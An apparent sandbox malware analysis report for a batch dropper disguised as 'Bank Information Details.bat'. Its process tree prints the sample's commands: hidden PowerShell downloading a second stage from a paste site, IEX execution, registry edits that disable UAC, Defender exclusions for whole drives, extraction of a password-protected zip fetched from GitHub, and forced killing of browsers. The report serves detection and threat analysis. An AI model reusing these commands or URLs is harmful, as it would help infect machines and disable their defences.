155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-11-2024 05:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bank Information Details.bat
Size

41KB
MD5

a2539089ecc2f92f81908c88ab2b2938
SHA1

9a18b58b8fc22ec070434020c537f4bfa5c57973
SHA256

155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9
SHA512

07a1a04a25c9063e8ba14b516b768906b115ae21d1133f01f8f4b7674e512bd876a5109d26aa1d78d91cbf3e7c9c730d6921f6cd95ab0ff5a5f58331a17dad40
SSDEEP

768:OfxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1KcTtb2w80P+RTXH7hhb:qxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1Kx

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://paste.fo/raw/024749876411

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2980 powershell.exe
7 2980 powershell.exe

flow	pid	process
5	2980	powershell.exe
7	2980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2980	powershell.exe
2776	powershell.exe
1972	powershell.exe
1248	powershell.exe
1200	powershell.exe
2944	powershell.exe
1424	powershell.exe
1604	powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

12 raw.githubusercontent.com
17 raw.githubusercontent.com
9 raw.githubusercontent.com
11 raw.githubusercontent.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

IEXPLORE.EXE

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

276 timeout.exe
1140 timeout.exe

flow	ioc
12	raw.githubusercontent.com
17	raw.githubusercontent.com
9	raw.githubusercontent.com
11	raw.githubusercontent.com

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

pid	process
276	timeout.exe
1140	timeout.exe

Kills process with taskkill 12 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2056	taskkill.exe
2704	taskkill.exe
2712	taskkill.exe
2788	taskkill.exe
2016	taskkill.exe
696	taskkill.exe
1512	taskkill.exe
2708	taskkill.exe
2660	taskkill.exe
1660	taskkill.exe
2920	taskkill.exe
2088	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73F1A871-9CCB-11EF-9CB9-62CAC36041A9} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1300 reg.exe
2312 reg.exe
2300 reg.exe
2560 reg.exe
1140 reg.exe
860 reg.exe
1464 reg.exe
1952 reg.exe
552 reg.exe
2248 reg.exe
2564 reg.exe
2356 reg.exe

pid	process
1300	reg.exe
2312	reg.exe
2300	reg.exe
2560	reg.exe
1140	reg.exe
860	reg.exe
1464	reg.exe
1952	reg.exe
552	reg.exe
2248	reg.exe
2564	reg.exe
2356	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2980	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
1248	powershell.exe
1200	powershell.exe
2944	powershell.exe
1424	powershell.exe
1604	powershell.exe
1972	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe7z.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	2304	7z.exe
Token: 35	2304	7z.exe
Token: SeSecurityPrivilege	2304	7z.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	696	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	2704	taskkill.exe
Token: SeDebugPrivilege	2708	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

680 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

680 iexplore.exe
680 iexplore.exe
1620 IEXPLORE.EXE
1620 IEXPLORE.EXE
1620 IEXPLORE.EXE
1620 IEXPLORE.EXE

pid	process
680	iexplore.exe

pid	process
680	iexplore.exe
680	iexplore.exe
1620	IEXPLORE.EXE
1620	IEXPLORE.EXE
1620	IEXPLORE.EXE
1620	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execmd.exeiexplore.exe

description	pid	process	target process
PID 2112 wrote to memory of 2904	2112	cmd.exe	cmd.exe
PID 2112 wrote to memory of 2904	2112	cmd.exe	cmd.exe
PID 2112 wrote to memory of 2904	2112	cmd.exe	cmd.exe
PID 2904 wrote to memory of 2980	2904	cmd.exe	powershell.exe
PID 2904 wrote to memory of 2980	2904	cmd.exe	powershell.exe
PID 2904 wrote to memory of 2980	2904	cmd.exe	powershell.exe
PID 2904 wrote to memory of 2776	2904	cmd.exe	powershell.exe
PID 2904 wrote to memory of 2776	2904	cmd.exe	powershell.exe
PID 2904 wrote to memory of 2776	2904	cmd.exe	powershell.exe
PID 2776 wrote to memory of 2680	2776	powershell.exe	cmd.exe
PID 2776 wrote to memory of 2680	2776	powershell.exe	cmd.exe
PID 2776 wrote to memory of 2680	2776	powershell.exe	cmd.exe
PID 2680 wrote to memory of 2564	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2564	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2564	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2560	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2560	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2560	2680	cmd.exe	reg.exe
PID 2904 wrote to memory of 680	2904	cmd.exe	iexplore.exe
PID 2904 wrote to memory of 680	2904	cmd.exe	iexplore.exe
PID 2904 wrote to memory of 680	2904	cmd.exe	iexplore.exe
PID 2904 wrote to memory of 276	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 276	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 276	2904	cmd.exe	timeout.exe
PID 2680 wrote to memory of 1140	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1140	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1140	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2356	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2356	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2356	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 860	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 860	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 860	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1464	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1464	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1464	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1300	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1300	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1300	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1952	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1952	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1952	2680	cmd.exe	reg.exe
PID 680 wrote to memory of 1620	680	iexplore.exe	IEXPLORE.EXE
PID 680 wrote to memory of 1620	680	iexplore.exe	IEXPLORE.EXE
PID 680 wrote to memory of 1620	680	iexplore.exe	IEXPLORE.EXE
PID 680 wrote to memory of 1620	680	iexplore.exe	IEXPLORE.EXE
PID 2680 wrote to memory of 552	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 552	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 552	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2300	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2300	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2300	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2312	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2312	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2312	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2248	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2248	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 2248	2680	cmd.exe	reg.exe
PID 2680 wrote to memory of 1248	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 1248	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 1248	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 1200	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 1200	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 1200	2680	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/024749876411', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2680
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2564
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
        5⤵
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Modifies registry key
        
        PID:2560
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1140
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2356
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:860
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1464
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1300
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1952
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:552
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2300
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2312
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1424
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/wada123wada/shsfdhdgh/refs/heads/main/NOTICE.zip
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:680
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:680 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1620
- - C:\Windows\system32\timeout.exe
    timeout /t 9
    3⤵
    - Delays execution with timeout.exe
    PID:276
- - C:\Program Files\7-Zip\7z.exe
    "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\NOTICE.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\system32\timeout.exe
    timeout /t 9
    3⤵
    - Delays execution with timeout.exe
    PID:1140
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:696
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM safari.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM brave.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM vivaldi.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM epic.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM yandex.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM CMD.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
157b713dd1c58d31b01d6a29dd935546

SHA1
220a5bcd94d3e91a34cc9b1682b16a493ecea5f6

SHA256
8af4172d2b4884dfd457e568135b09deafd0bb8516832f2f0f776be9977fded9

SHA512
e1817d205f400fbf22dfcbc27f17c61f22e69383100b0743163abe110e92c23c82bfcbefc4ffca9df6ef74bdf6c3d03f1c00df29e4d1455f3e9426a7e904f72e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
33b6e3828beadafc181b5b08c46653bc

SHA1
489c832ab724b5e22d40aff678e7ec6c19b302f3

SHA256
ae98448304cf1a176cfd0af751741332fb7427c05f35074a2d296f30e5002c16

SHA512
1729613dbf7a0d2ee36af0cc86dbb07115bd88b3577bba703bf536075c78d183bd84eb2987a089be4c157b2204d5932df85198274d8f629d6bfdf5c4579a7946

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1a1bfb5b52d0435752f5732826d5b50b

SHA1
bf337752501c117dc4fd99049a97b368770f492f

SHA256
07e039e4dffe6eecc450201b7bf18b033436d07f4a15220b2abbeb4ed05d3ac1

SHA512
beee3467b7bcf3b65eec78b01902093a8f882d1ea45eebd38c19b1e76e9e5e9bf44caad650e5675d2751e90b73e757e5d712fa4619912b9bd3e5c14ee8b7ef82

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a2408197f542b64aa481eb6d5ac18174

SHA1
b7192edc1190dd3b3327d1f8c41a9c5cf56af0c2

SHA256
11eaa2fbc8bfd71d26967e382ec9e3179539cd4c7effcd874a92578422a3850c

SHA512
1deb8feb01f2b24e97f4f16fd19dc4f3d3d29857f6b019b4c27fd73f125b919965f3d4e6db066f702bac0c99a5a9e5095f9f8c54142eb050611a7abf5b6ec04b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c936933dace1edb211087919628bfb85

SHA1
94cd620e530965e7ae606a1effefa757addaf946

SHA256
9372125c68787f8837704db95212869ea32d278447ce5097033d59a4ed0eacc9

SHA512
2d838d3c990e48dd4824e4bbd0639e0a14e0cb94b87e358818ca77a473e9d34507901ffc6e5a7aedee93eb662141a098b6acc433b408de2bcc4f90d631daaffe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4786f0df1d39b8897fe6fb969a9c3d91

SHA1
10dd25628508cc1e301ff1ad07bc09e16d886c4d

SHA256
cf6c75cdc9475234d210bde0911ba164f9e2d4e885c5c6b61188f9110dd42cea

SHA512
86c4b89a9ac00d3b0785b7b402d037c791992a97dae2f042857240f7f682fdee15fe1f6445ab25e7fb171b2e07b6d007ffbac0b414f1eeb228115e69a2f637ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1af56ffac2119ecebd6cbb9062f399c6

SHA1
